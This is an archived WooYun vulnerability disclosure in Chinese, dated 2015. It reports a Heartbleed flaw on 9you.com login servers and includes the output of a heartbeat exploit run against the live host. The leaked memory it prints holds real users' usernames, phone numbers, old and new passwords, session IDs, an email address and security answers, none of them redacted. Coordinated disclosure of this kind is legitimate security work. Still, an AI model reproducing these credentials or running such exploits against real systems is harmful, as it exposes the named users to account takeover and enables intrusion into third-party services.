乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-04: 细节已通知厂商并且等待厂商处理中 2015-07-08: 厂商已经确认,细节仅向厂商公开 2015-07-18: 细节向核心白帽子及相关领域专家公开 2015-07-28: 细节向普通白帽子公开 2015-08-07: 细节向实习白帽子公开 2015-08-22: 细节向公众公开
233
fj.9you.com$ping fj.9you.comPING fj.9you.net (120.197.83.153) 56(84) bytes of data.64 bytes from 120.197.83.153: icmp_seq=1 ttl=50 time=31.1 ms64 bytes from 120.197.83.153: icmp_seq=2 ttl=50 time=31.0 ms64 bytes from 120.197.83.153: icmp_seq=3 ttl=50 time=31.1 ms
Connecting...Sending Client Hello...Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 521 ... received message: type = 22, ver = 0302, length = 203 ... received message: type = 22, ver = 0302, length = 4Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384Received heartbeat response:[email protected][...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...I.....4.2...#.Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)..Content-Length: 59..Host: passport.9you.com.O=...d.LG..i3Zq.....988607; PHPSESSID=c708128d7d2b4d6a28de53ddddf552ee....*..M...T.,B'.3..=1435988607; PHPSESSID=c708128d7d2b4d6a28de53ddddf552ee....>?].^G....I...%.08128d7d2b4d6a28de53ddddf552ee?.b1...T.. i..d.$.f~EL...B\Eo,x..t.9you.com%252Findex.php....modify=1&username=15530042097&newpasswd=15530042097aa&renewpasswd=15530042097aa&x=35&y=18...4...V..hZ...-..g..dgn20150704&x=66&y=23du.n....BKy..+.._..F..S#)..e..PE5|..:.2...`c$.y..KQassport.9you.com%252F.....L.m....0qzK7...!.4P..`....t..6=.z/!.passport.9you.com%252F.d.t!/.m.0...3.;..TH.q....&;.v^.P...抓取到用户名密码:modify=1&username=15530042097&newpasswd=15530042097aa&renewpasswd=15530042097aa&x=35&y=18登陆:
抓到的部分信息,未整理&username=xiaodong525&area=au&areaid=1&checkcode=5AUV&x=63&y=26Provip=1&username=15038511488&vipcode=19930926&x=44&y=11.....resecretemail=344049766%40qq.com&x=40&y=16q&checkcode=jmyz&mobile=13727831837-username=gening0316&oldpasswd=a003002001%21&newpasswd=a214316%3F&renewpasswd=a214316%3F&x=33&y=14 &dataType=json&checkcode=jmyz&mobile=13727831837&ssosessionid=8e1e7fa7-a91f-41d9-8b1c-52d26175d7cf....verfiystr=fc57dd29e41e5913f4649f57c941e8cb&username=xiaodong525&area=au&areaid=1&checkcode=5AUV&x=63&y=268B%BD%C7%92%E6%8B%BD&protocal=1&x=47&y=25.UmProvip=1&username=15038511488&vipcode=19930926&x=44&y=11还有注册的信息:appeal=2&username=dongxiao525&answer1=%E5%86%AC%E5%86%AC%E7%8E%8B%E5%85%AB%E8%9B%8B&answer2=&secureCode=&email=&idcard=®date=®name=®phone=®email=&oldpw1=XY7758521&oldpw2=123456789&oldpw3=XY635121-%2B&x=48&y=25只抓了一会,发现用户注册和重置密码的时候能100%抓到详情。数据证明就到这里。
~~~
危害等级:高
漏洞Rank:20
确认时间:2015-07-08 14:38
感谢提交漏洞。
暂无